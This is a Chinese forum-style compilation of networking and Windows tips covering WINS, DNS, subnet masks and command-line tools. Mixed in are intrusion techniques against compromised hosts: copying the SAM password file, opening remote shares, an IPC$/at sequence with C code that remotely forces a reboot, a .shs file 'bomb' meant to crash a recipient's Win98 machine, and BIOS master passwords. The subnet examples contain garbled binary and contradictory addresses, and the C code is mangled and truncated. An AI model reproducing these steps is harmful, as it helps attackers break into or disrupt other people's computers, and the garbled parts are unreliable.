向WINS服务器发送一个名字释放的请求,以请求释放其映射在WINS服务器数据库中的IP地址和NetBIOS名字。收到释放请求后,WINS服务器验证一下在它的数据库中是否有该IP地址和NetBIOS名,如果有就可以正常释放了,否则就会出现错误(WINS服务器向WINS客户端发送一个负响应)。如果计算机没有正常关闭,WINS服务器将不知道其名字已经释放了,则该名字将不会失效,直到WINS名字注册记录过期。4.名字解析当客户端在许多网络操作中需要WINS服务器解析名字,例如当使用网络上其它计算机的共享文件时,为了得到共享文件,用户需要指定两件事:系统名和共享名,而系统名就需要转换成IP地址。名字解析过程是这样的:(1).当客户端计算机想要转换一个名字时,它首先检查本地NetBIOS名字缓存器。(2).如果名字不在本地NetBIOS名字缓存器中,便发送一个名字查询到首选WINS服务器(每隔15秒发送一次,共发三次),如果请求失败,则向次选WINS发送同样的请求。(3).如果都失败了,那么名字解析可以通过其它途径来转换(例如本地广播、lmhosts文件和hosts文件、或者DNS来进行名字解析。三.WINS服务器和客户端的需求1.Microsoft对服务器的需求(1).至少提供一个首选WINS服务器和一个次选WINS服务器来提供容错功能。(2).一个WINS服务器每分钟可以处理近1500个名字注册和约4500个名字查询。因此我们强烈建议你一个首选和一个次选WINS服务器可以带动10000个客户端。(3).如果WINS服务器与客户机不在同一个子网上,就要考虑到路由器的性能了。2.客户端的需求几乎所有的支持网络互联的Microsoft客户端都可以是WINS客户端,下面列出了可以与WINS一起工作的客户端:*Windows NT Server 3.5x,4.0*Windows NT Workstation 3.5x,4.0*Windows 9x/me/2000*Windows for Workgroups with TCP/IP-32*Microsoft Network Client 3.0 for MS-DOS*LAN Manager 2.2c for MS-DOS基于DOS的客户端也可以用WINS服务器进行名字解析,但你必须为它们在WINS服务器中添加静态词条。问:什么是“DNS”?其中文为何?答:DNS,简单地说,就是Domain Name System,翻成中文就是“域名系统”。问:DNS有什么用途?答:在一个TCP/IP架构的网络(例如Internet)环境中,DNS是一个非常重要而且常用的系统。主要的功能就是将人易于记忆的Domain Name与人不容易记忆的IP Address作转换。而上面执行DNS服务的这台网络主机,就可以称之为DNS Server。基本上,通常我们都认为DNS只是将Domain Name转换成IP Address,然后再使用所查到的IP Address去连接(俗称“正向解析”)。事实上,将IP Address转换成Domain Name的功能也是相当常使用到的,当login到一台Unix工作站时,工作站就会去做反查,找出你是从哪个地方连线进来的(俗称“逆向解析”)。问:DNS是怎么运作的?答:DNS是使用层的方式来运作的。例如:哈工大紫丁香站的Domain Name为bbs.hit.edu.cn,这个Domain Name当然不是凭空而来的,是从.edu.cn所分配下来的。.edu.cn又是从.cn授予(delegation)的。.cn是从哪里来的呢?答案是从“.”,也就是所谓的“根域”(root domain)来的。根领域已经是Domain Name的最上层。而“.”这层是由InterNIC(Internet Network Information Center,互联网信息中心)所管理。全世界的Domain Name就是这样,一层一层的授予下来。问:当我查一个Domain Name时,DNS是怎么查出它的IP的呢?答:举个例子,假设今天我们查的Domain Name(作一个dns query)为bbs.hit.edu.cn时,DNS Server会这么处理:(1)你所用的电脑(可能是PC,也可能是工作站)送出一个问题给这台电脑所设定的DNS Server,提问:bbs.hit.edu.cn的IP是什么?(2)这台DNS会先看看是不是在它的cache中,如果是,就丢出答案。如果不是,就从最上头查起。在DNS Server上面一定有设定“.”要跟谁问。所以,这个时候它就往“.”层的任何一台DNS(目前“.”有13台)问:.cn要问谁?(3)“.”层的DNS会回答.cn要向谁查(同时你用的DNS会cache起来这个答案)。(4)接下来你所用的DNS就会向.cn这层的DNS问:.edu.cn要问谁?(5).cn的这层就会回答.edu.cn要向谁查(同时你用的DNS也把这答案cache起来)。(6)直到bbs.hit.edu.cn回答:bbs.hit.edu.cn的IP是202.118.224.2(又cache起来)。经过了这么多的过程,终于得到了这个IP,接下来才能作进一步的连线。要注意的是,在每一层都会问一个问题,并且把答案记下来(cache起),而且还会忘掉(看该层的设定是要cache多久)。问:DNS要怎么设置?答:如果,只是要使用DNS,那只要在TCP/IP的网络属性中设置即可。设置的方法跟使用的操作系统有关。例如:Windows 9x在“控制面板”→“网络”→“TCP/IP”→“属性”中,找到DNS的部分再来设置。Unix在/etc/resolv.conf这个文件中设置(如果,要架设一台DNS Server,就不是在这里讨论的了)。
作者:xiezi99
子网掩码和IP地址的关系。子网掩码是用来判断任意两台计算机的IP地址是否属于同一子网络的根据。 最为简单的理解就是两台计算机各自的IP地址与子网掩码进行AND运算后,如果得出的结果是相同的,则说明这两台计算机是处于同一个子网络上的,可以进行直接的通讯。就这么简单。 请看以下示例: 运算演示之一:aa I P 地址  192.168.0.1 子网掩码  255.255.255.0 AND运算 转化为二进制进行运算: I P 地址 00. 子网掩码 11. AND运算      00. 转化为十进制后为:       192.168.0.0 运算演示之二: I P 地址  192.168.0.254 子网掩码  255.255.255.0 AND运算 转化为二进制进行运算: I P 地址 00. 子网掩码 11. AND运算      00. 转化为十进制后为:       192.168.0.0 运算演示之三: I P 地址  192.168.0.4 子网掩码  255.255.255.0 AND运算 转化为二进制进行运算: I P 地址 00. 子网掩码 11. AND运算      00. 转化为十进制后为:       192.168.0.0   通过以上对三组计算机IP地址与子网掩码的AND运算后,我们可以看到它运算结果是一样的。均为192.168.0.0   所以计算机就会把这三台计算机视为是同一子网络,然后进行通讯的。我现在网吧使用的代理服务器,内部网络就是这样规划的。 也许你又要问,这样的子网掩码究竟有多少了IP地址可以用呢?你可以这样算。 根据上面我们可以看出,局域网内部的ip地址是我们自己规定的(当然和其他的ip地址是一样的),这个是由子网掩码决定的通过对255.255.255.0的分析。可得出:   前三位IP码由分配下来的数字就只能固定为192.168.0  所以就只剩下了最后的一位了,那么显而易见了,ip地址只能有(2的8次方-1),即256-1=255一般末位为0或者是255的都有其特殊的作用。 那么你可能要问了:如果我的子网掩码不是255.255.255.0呢?你也可以这样做啊假设你的子网掩码是255.255.128.0 那么你的局域网内的ip地址的前两位肯定是固定的了(什么,为什么是固定的?你看上边不就明白了吗?·#¥) 这样,你就可以按照下边的计算来看看同一个子网内到底能有多少台机器 1、十进制128 = 二进制 2、IP码要和子网掩码进行AND运算 3、 I P 地址 01001.1*******.******** 子网掩码 00. AND运算      00. 转化为十进制后为:       16 . 73 . 128 . 0 4、可知我们内部网可用的IP地址为: 00.        到 11. 5、转化为十进制: 16.73.128.0 到 16.73.255.255 6、0和255通常作为网络的内部特殊用途。通常不使用。 7、于是最后的结果如下:我们单位所有可用的IP地址为: 192.168.128.1-192.168.128.254 192.168.129.1-192.168.129.254 192.168.130.1-192.168.130.254 192.168.131.1-192.168.131.254 . . . . . . . . . . . . . 192.168.139.1-192.168.139.254 192.168.140.1-192.168.140.254 192.168.141.1-192.168.141.254 192.168.142.1-192.168.142.254 192.168.143.1-192.168.143.254 . . . . . . . . . . . . . 192.168.254.1-192.168.254.254 192.168.255.1-192.168.255.254 8、总数为(255-128+1)*(254-1+1) =128 * 254 = 32512 FAINT!!!!@#!@把我们公司都卖了还买不了这么多的机器呢!·¥!·# 9、看看的结果是否正确   (1)、设定IP地址为192.168.128.1     Ping 192.168.129.233通过测试     访问可以显示出主页   (2)、设定IP地址为192.168.255.254     Ping 192.168.129.233通过测试     访问可以显示出主页 10、结论   以上证明我们的结论是对的。 现在你就可以看你的子网中能有多少台机器了 255.255.255.128 分解: 11.1000000 所以你的内部网络的ip地址只能是 xxxxxxxx.xxxxxxxx.xxxxxxxx.0??????? 到 xxxxxxxx.xxxxxxxx.xxxxxxxx.1、IP地址:  Internet网是由不同物理网络互连而成,不同网络之间实现计算机的相互通信必须有相应的地址标识,这个地址标识称为IP地址。IP地址提供统一的地址格式即由32Bit位组成,由于二进制使用起来不方便,用户使用“点分十进制”方式表示。IP地址唯一的标识出主机所在的网络和网络中位置的编号,按照网络规模的大小,常用IP地址分为以下三类:  A:这类地址的特点是以0开头,第一字节表示网络号,第二、三、四字节表示网络中的主机号,网络数量少,最多可以表示126个网络号,每一网络中最多可以有个主机号。0******* ******** ******** ******** l—126 0—255 0—255 1—254   B:这类地址的特点是以l0开头,第一、二字节表示网络号,第二、三字节表示网络中的主机号,最多可以表示16384个网络号,每一网络中最多可以有66534个主机号。10****** ******** ******** ******** 128一191 0—255 0—255 1—254   C:这类地址的特点是以110开头,第一、二、三字节表示网络号,第四字节表示网络中的主机号,网络数量比较多,可以有2097152个网络号,每一网络中最多可以有254个主机号。110***** ******** ******** ******** 192—233 0—255 0—255 1—254   IP地址规定:  网络号不能以127开头,第一字节不能全为0,也不能全为l。  主机号不能全为0,也不能全为l。  2、为了快速确定IP地址的哪部分代表网络号,哪部分代表主机号,判断两个IP地址是否属于同一网络,就产生的子网掩码的概念,子网掩码按IP地址的格式给出。 A、B、C类IP地址的默认子网掩码如下:A: 255.O.O.0 B: 255.255.0.O C: 255.255.255.0   用子网掩码判断IP地址的网络号与主机号的方法是用IP地址与相应的子网掩码 进行与运算,可以区分出网络号部分和主机号部分。  如10.68.89.1是A类IP地址,所以默认子网掩码为255.0.0,O,分别转化为二进制进行与运算后,得出网络号为10。再如202.30.152.3和202.30.152.80为C类 IP地址,默认子网掩码为255.255.255.0,进行与运算后得出二者网络号相同,说明两主机位于同一网络。  子网掩码的另一功能是用来划分子网。在实际应用中,经常遇到网络号不够的问题,需要把某类网络划分出多个子网,采用的方法就是将主机号标识部分的一些二进制位划分出来用来标识子网。  3、网关地址:在Internet网中,网关是一种连接内部网与Internet上其它网的中间设备,也称“路由器”。网关地址是可以理解为内部网与Internet网信息传输的通道地址。
作者:xiezi99
网络知识扫盲。1)如何查看本机所开端口:用netstat -a —n命令查看!再stat下面有一些英文,我来简单说一下这些英文具体都代表什么LISTEN:侦听来自远方的TCP端口的连接请求SYN-SENT:再发送连接请求后等待匹配的连接请求SYN-RECEIVED:再收到和发送一个连接请求后等待对方对连接请求的确认ESTABLISHED:代表一个打开的连接FIN-WAIT-1:等待远程TCP连接中断请求,或先前的连接中断请求的确认FIN-WAIT-2:从远程TCP等待连接中断请求CLOSE-WAIT:等待从本地用户发来的连接中断请求CLOSING:等待远程TCP对连接中断的确认LAST-ACK:等待原来的发向远程TCP的连接中断请求的确认TIME-WAIT:等待足够的时间以确保远程TCP接收到连接中断请求的确认CLOSED:没有任何连接状态2)如何获得一个IP地址的主机名?利用ping -a ip 命令查看!再第一行的pinging后面的 『ip』前面的英文就是对方主机名!同样道理,利用ping machine_name也可以得到对方的ip获得一个网站的ip地址的方法是:ping www.***.com比如想知道sohu的ip,就用ping 来查看就可以了顺便说一句:如果返回:Reply from *.*.*.*: TTL expired in transit的话,呵呵,代表TTL(生命周期)在传输过程中过期什么意思呢?我来解释一下!导致这个问题出现的原因有两个:1)TTL值太小!TTL值小于你和对方主机之间经过的路由器数目。 2)路由器数量太多,经过路由器的数量大于TTL值!呵呵,其实这两点是一个意思!只不过说法不同而已!3)如何查看本机的ip地址?用ipconfig来查看就可以!也可以再Windows中的开始菜单,运行中输入winipcfg,同样可以看到自己的ipipconfig命令后面如果加一个参数 /all的话,可以得到更加详细的资料,比如DNS、网关等……4)再使用net命令的时候遇到一些错误代码,如何查看对应的错误信息?用命令 net helpmsg erorr_code来查看就可以了比如错误代码为:88则查看命令为:net helpmsg 88 下面有这个错误代码的中文显示!5)利用telnet连接到对方主机上,想获得一些系统信息,用什么命令?set命令可以很好的完成你所需要收集信息的任务的!方法:再cmd下直接输入set(telnet对方主机以后,也是直接set就可以了~然后能够得到NNNNN多的信息)再这里,computername:呵呵,还用说么?主机名!OS=Windows_NT :操作系统的类型哦~path=C:\perl\bin\ :(perl的解释器位置!)systemDrive=c: 操作系统盘符!USERNAME=coldcrysky 当前登陆使用机器的用户……(6)跟踪路由器的命令是什么?tracert 格式:tracert ip中间会列出所有经过的路由器列表!这些路由器如果是暴露再防火墙外面的话,还可以看到路由的IP哦~呵呵(这里又涉及到了另外一个问题:为什么要把路由放在防火墙后面?原因呢,主要有两点:1)保护路由器!因为现在越来越多的攻击和入侵已经开始瞄准路由器了~如果直接把路由暴露在外面,呵呵,是非常危险的!被DoS了就不好了啊~呵呵,所以要放在防火墙里面;2)为路由器减少负担!如果所有的过滤功能统统都压在路由器上面,呵呵,路由器的负担就太大了!)当然,利用pathping也可以达到同样效果!格式与tracert一样!7)简单介绍一下cookie!cookie,又名小甜点。它的作用:记录访问者的一些信息。例如利用cookie记录你所登陆这个网页的次数、登陆时曾经输入的信息……最常见的是,大家再登陆论坛(邮箱)的时候,经常在输入第一个字母的时候,往往下面就显示出了所有在本机登陆过该论坛(邮箱)的用户名吧?呵呵,这个就是cookie的作用!大家在Administrator的cookies目录中可以看到很多的记事本文档吧?这些都是cookie,虽然经过了加密,但是仔细查找的话,仍然能够看到一些敏感信息!况且现在也已经有了专门查看cookie的软件!利用这些软件,你的隐私将不保哦~那么,如何清除cookie呢?一般情况下,可以在Internet选项中的常规选项卡中看到一个删除cookies的按钮,点击就可以清楚掉了~除此以外,还要在internet选项中的内容选项卡中找到自动完成按钮,把里面的四项都选中!然后点击清除表单,清除密码~然后到操作系统目录所在的分区中!进入Winnt(98为windows)目录(当然了,这些都是默认的目录!如果你安装的时候改名了,就对应的去相应目录)之后找到Temporary Internet Files目录(2000的目录在c:\Documents and settings\administrator\Local settings\Temporary Internet Files)98直接到windows目录下找Temporary Internet Files就可以了~,找到这个文件夹后,打开!看到里面有NNNNNNNNNNNN多的文件了么?呵呵,这些是你浏览过的网页的记录(有的时候从网站上面看到漂亮的FLASH,可是不能保存怎么办?只要在线浏览一遍以后,断线到这里来找*.swf,之后依次打开查看的话,相信你会找到你所需要的FLASH的!),好了,跑题了~继续说:这些文件是网站的页面记录,直接删除就可以了!另外,有没有彻底禁止cookie的方法呢?呵呵,当然有了!在IE的Internet选项中,找到隐私选项卡!,把里面的滑块拖到最上面,边上写着:阻止所有cookie,呵呵,是不是?另外一种方法:找到Windows目录下的cookies目录!把里面的txt文件全部删除!,最后应该只剩下一个index.dat文件!之后把这个文件夹设置成只读就可以了~不过,禁止cookie后,大部分的论坛都无法正常登陆了啊!呵呵,到底禁止不禁止就看你自己的了~8)安装2000的时候,速度会特别特别特别慢,怎么加快安装速度呢?在DOS上面安装,应该用98启动光盘来引导系统!然后按照下面的方法来做,可以提高安装速度:g:\&cd windows -------假设G为光驱 windows为98的安装目录!g:\windows&smartdrv -------加载smartdrv程序!加载后没有任何提示信息!只要不返回错误信息就是加载成功了~这时候安装2K的话,速度会很快的哦~9)Windows2K密码忘记了,如何才能进入系统?Windows2K的用户配置信息和密码保存在SAM文件里!该文件位于:c:\winnt\system32\config目录中!只要删除这个文件就可以了~另外,在c:\winnt\repair目录中也同样有一个SAM文件(这个是前者的备份!)如果你在登陆肉鸡的时候,copy前面那个目录中的SAM文件,你会发现COPY不下来!呵呵,为什么?因为运行着的2K系统会保护SAM文件啊~这个时候你就COPY这个就可以了!10)ping不到,tracert不到,但是却能用nbtstat显示对方的一些信息,为什么?因为tracert和ping命令使用的是ICMP协议!而nbtstat是通过对方的netbios端口来获得对方的主机信息的!使用的是UDP和TCP协议!如果对方仅仅只对ICMP协议做了禁止的话,那通过这个命令获得系统信息是正常的!11)telnet上去后,如何给对方开共享?开共享的命令如下:net share c=c:\winnt\system 返回共享成功之后直接利用\\ip\c来访问对方的system目录了~删除共享用share c /del 命令就可以了12)如何判断对方的具体操作系统版本?首先用ver命令查看对方的版本号!如果是5.00.2195的话,为2K;5.1.2600为XP从这里可以区分出来到底是2K还是XP了~下面进行更加具体的区分!2K的pro和svr版本区分:在telnet下,net shart查看启动的服务~如果对方开启了Terminal Services服务的话,基本上可以判断为svr以上的版本了~如果没有开启,则为pro!(具体方法有三种,因为前几天在论坛中我回复过暗界了~所以这里就不再重复了~)XP的pro和home版的区分:home edition是无法安装iis的!所以,可以通过iis服务来判断到底是home版或者是pro了~当然了,如果对方是pro,但是将iis删除(停用)的话,就没办法判断了~呵呵13)如何查看98的随机启动的程序?在98下有一个实用配置程序(msconfig),中文名为:系统配置实用程序,调用的方法是在:开始--运行中输入msconfig,在里面,有一个启动的选项卡,点击后,可以看到很多随即启动程序,如果前面带有钩的话,就是启动时随机启动的,取消的话就是把前面的小钩去掉就可以了~(如果在这里查看到了一些未知的启动文件--比如没有文件的具体路径,或者没有文件名的话,最好取消它的自启动!因为很有可能是木马!)除了这里以外,还有config.sys、autoexec.bat、system.ini、win.ini几个选项卡,他们分别对应这几个文件!只不过在这里更方便查看而已!
作者:xiezi99
14)设置了BIOS密码,可是却忘记了,该怎么办?如果是可以进入Windows的话,可以找找biospwds和cmospwd这两个软件看看~还有利用DEBUG法:简单介绍两种:1)-o 70 16-o 71 13-q2)-o 70 16-o 71 16-q另一种方法:copy法:copy con cmos.com输入下面10个字符:alt+176,alt+17,alt+230, p,alt+176,alt+20,alt+230,q,alt+205,空格,然后按下F6并回车,退出,运行这个cmos.com程序就可以了~恩,如果不能进入Windows怎么办呢?简单介绍两种方法:1)用通用密码:Award Bios密码:j256,LKW-PPETER,wantgirl,EBBB,Syxz,AWARD? SW,AWARD_SW,j262,HLT SER,SKY_FOX,BIOSTAR,ALFARO_ME,lkwpeter,589721,awkard,h996,CONCAT,589589AMI bios密码:AMI,BIOS,PASSWORD,HEWITT RAND,AMI_SW,LKWPETER,A.M.I.这是常见的密码,不妨试试~如果不行的话,可以利用CMOS放电:就是把主板上的电池取下来,等一会儿再插上去~15)如何自制一个让98蓝屏的炸弹?恩,这个是前几天QQ上面朋友问我的问题,整理的时候突然间想起来了,就写一下好了~首先,打开Word,再插入菜单中选择对象,这时,弹出对象包装程序窗口,再这个窗口中,点击导入,随便找一个文本或者程序就可以!之后点:编辑菜单。这里选择命令行,出现一个命令行窗口,在里面协商c:\con\con,点击保存,完成后,再点编辑包中的复制包,把他随便到一个地方复制下来,之后看到的是一个名位片断的东西!给这个文件起一个名字,呵呵,传给那个可怜的家伙吧,等待他蓝屏,掉线!(这个命令行中可以插入很多的命令,不见得非要用这个98蓝屏漏洞哦~)顺便说一下:这个已经不是什么新鲜的技术了,这个技术的名字叫做:碎片对象。呵呵,碎片?记忆碎片么?不是的!他的后缀是:.shs!之所以说一下这个,是因为有的朋友还不知道~做一个整理而已!不知道的朋友看过后就知道了,知道的朋友就权当复习了~另外,不要利用这个方法做破坏!否则后果自负!16)如何再命令行下杀死对方进程?利用微软的2K以上操作系统都是含有这个工具的!该工具包含在2K光盘的\support\tools文件夹下!里面有安装程序,点击后,就安装了2K的support tools工具包,里面有kill这个工具,这时候再cmd下可以输入kill/?,就可以看到帮助了,使用这个命令的格式是:kill pid (pid是进程的ID号!)再任务管理器中可以看到进程的ID号!(不知道有几位朋友用过蓝色火焰?呵呵,用法跟这个一摸一样!还有很多类似的木马、后门软件都有类似的功能!这个是windows自带的大木马『后门工具』而已!)这时候,有朋友问了,那再命令行下如何查看进程呢?呵呵,这就用到了系统自带的有一个后门工具了:再刚才说得那个目录中,还有一个工具叫tlist 看名字就能看出来是干什么的吧?用法更简单!直接输入tlist就可以得到pid遇队形程序的列表了~那对方机器如果没有安装这两个程序怎么办呢?没关系,你把你操作系统盘符下面programfiles\support tools目录下面的这两个对应的exe文件上传到对方的winnt\system32目录中就可以了!呵呵~17)上次说了ping的基本用法,这次谈谈ping的命令参数!这个是本次问题集的重点部分!无论是小鸟还是老鸟,你们能保证你真的对这些参数了如指掌么?恐怕都未必!还是好好看看吧!这是TCP/IP协议中最有用的命令之一 它给另一个系统发送一系列的数据包,该系统本身又发回一个响应,这条实用程序对查找远程主机很有用,它返回的结果表示是否能到达主机,宿主机发送一个返回数据包需要多长时间。 Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS] [-r count] [-s count] [[-j host-list] [-k host-list]] [-w timeout] destination-list Options: -t Ping the specifed host until interrupted.(除非人为中止,否则一直ping下去) -a Resolve addresses to hostnames.(把IP转为主机名) -n count Number of echo requests to send.(响应请求的数量) -l size Send buffer size.(封包的大小) -f Set Don`t Fragment flag in packet.(信息包中无碎片) -i TTL Time To Live.(时间) -v TOS Type Of Service.(服务类型) -r count Record route for count hops. -s count Timestamp for count hops. -j host-list Loose source route along host-list. -k host-list Strict source route along host-list.(较严格的……唉,怎么译好……算了,放着吧) -w timeout Timeout in milliseconds to wait for each reply.(timeout的时间) 比如大家可能都知道的一个命令 # ping -f -s 65000 ***.***.***.***或者前阶段大家所谓ping死霉国佬时所用的命令(当然这样只会造成我方自己的网络阻塞)。 其实这个命令主要是用来看对方应答的速度,如果怎么ping 得到的结果都是request time out。那恐怕你根本就不用你去找这台主机了,它不在你的射程之内。 18)如何查看本机的DNS服务器?ipconfig其实是可以的(呵呵,上次就介绍过这个命令),除此以外,还可以利用一个命令:再cmd下输入netsh,进入到netsh&提示符,再输入:int ip 进入到interface ip& 然后再次输入dump,这时候屏幕上出现当前连接的配置情况了这里必须介绍一下netsh到底是作什么用的!这个命令比较复杂,他包含了很多的子命令,所以这里只对部分命令进行讲解:1)查看本机IP:首先键入netsh,再netsh&提示符下输入:interface 回车 之后:ip 回车 再之后:show address 回车 这样,就可以看到当前连接的IP地址和子网掩码。(其实这个命令不如ipconfig简单,也不如ipconfig/all全面)2)修改网络配置:接着上面的命令,我们使用:set address name=“本地连接” source=static addr=192.168.0.200 mask=255.255.255.0,这样就修改了当前的IP地址,用show address来看看(或者用ipconfig)3)显示一个完整的网络配置教本:刚才说过,第一个命令显示的信息不如ipconfig/all全面,不用着急,netsh再打印显示网络配置上,还是有自己的特色的!例如:再interface ip&状态下输入:dump,会显示一个清单,显示所有本地连接(不管你是否使用~)与netstat -an不完全一样!这就是netsh的简单介绍和最基础的用法!希望大家能够掌握!还可以输入?来查看帮助!(要在netsh&提示符下才能查看帮助啊~)19)肉鸡上的部分文件无法删除,怎么办?如果对方的文件夹是只读的话,会出现拒绝访问的字样!这时候,我们可以再del命令后面加上/f参数来删除!20)再说一个可以限制用户登陆时间的命令!再net命令中就可以实现这样的功能!具体方法如下:假如我们打算让:coldcrysky这个用户再周日到周易的上午八点到下午四点之间可以登陆,用这个命令:net user coldcrysky /timesunday-monday,08:00-16:00之后利用net user coldcrysky命令来查看登陆时间的限制,可以看到是我们所规定的时间(因为是中文的,很容易懂,我就不多废话了)在此,特别提醒各位:命令中:星期日才是一周的开始!!!不要当成星期一!光说了怎么设置,如果想恢复回去怎么办呢?(就是恢复成默认状态,任何时间都可以登陆的状态)看我的:net user coldcrysky /time:all --这样就可以了~22)如何删除windows2K的默认贡献?首先打开记事本,输入如下内容:net share c$ /deletenet share d$ /deletenet share e$ /deletenet share f$ /deletenet share g$ /deletenet share ipc$ /deletenet share admin$ /delete这里的c$、d$、e$……是代表默认共享的盘符~又几个就设置几个就可以了~之后点击保存成批处理文件(后缀为:bat的文件!)!加入到启动组中就可以了~23)139端口的又一用法呵呵,写这个帖子的原因是因为我答应给一个朋友回复139端口的作用来着……先声明两点:1)不要利用本帖所提到的方法去搞恶意破坏!2)呵呵,可能许多人已经知道了139端口这个用法了~本文只想起到一个抛砖引玉的作用!废话不多说了~开始:如果你使用NT主机的话,那你可要注意了!重启NT主机的方法如下:1:Net use \\XXX.XXX.XXX.XXX\ipc$ "password" /user:"username"建立一个IPC连接2:net use H: \\XXX.XXX.XXX.XXX\C$将对方的C盘映射为自己的h盘3:copy c on h:\reboot.batIisreset /rebootCTRL+Z在对方的C盘上生成一个能重启机器的文件4:net time \\XXX.XXX.XXX.XXX得到对方机器时间5:at \\XXX.XXX.XXX.XXX 重启的时间 c:\reboot.bat设定对方重启的时间!6:at \\XXX.XXX.XXX.XXX查看任务上面是否添加了这个任务7:等对方重启好了~上面的第三步是only for Win2K的,如果是Nt,就需要用意个指定的重启程序,我们可以自己编写一个reboot.exe来代替reboot.bat,代码如下:#include "stdio.h"#include "windows.h"int main(){文件://定义重启的时候发送给所有用户的消息LPSTR msg="Reboot Tool By LionHook\nhttp://www.xici.net";;文件://尝试用最简单的API函数重启if(ExitWindowXXX(EWX_REBOOT.0))return TRUE;if(ExitWindowXXX(EWX_REBOOT | EWX_FORCE,0))return TRUE;文件://因为上面的重启不成功,所以需要调整本进程的特权HANDLE hTTOKEN_PRIVILEGESif(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES |TOKEN_QUERY,&hToken)) return FALSE;文件://获取重启的特权 SE_SHUTDOWN_NAMELookupPrivilegevalues(NULL,SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);tkp.PrivilegeCount=1;tkp.Privileges[0].Attributes=SE}

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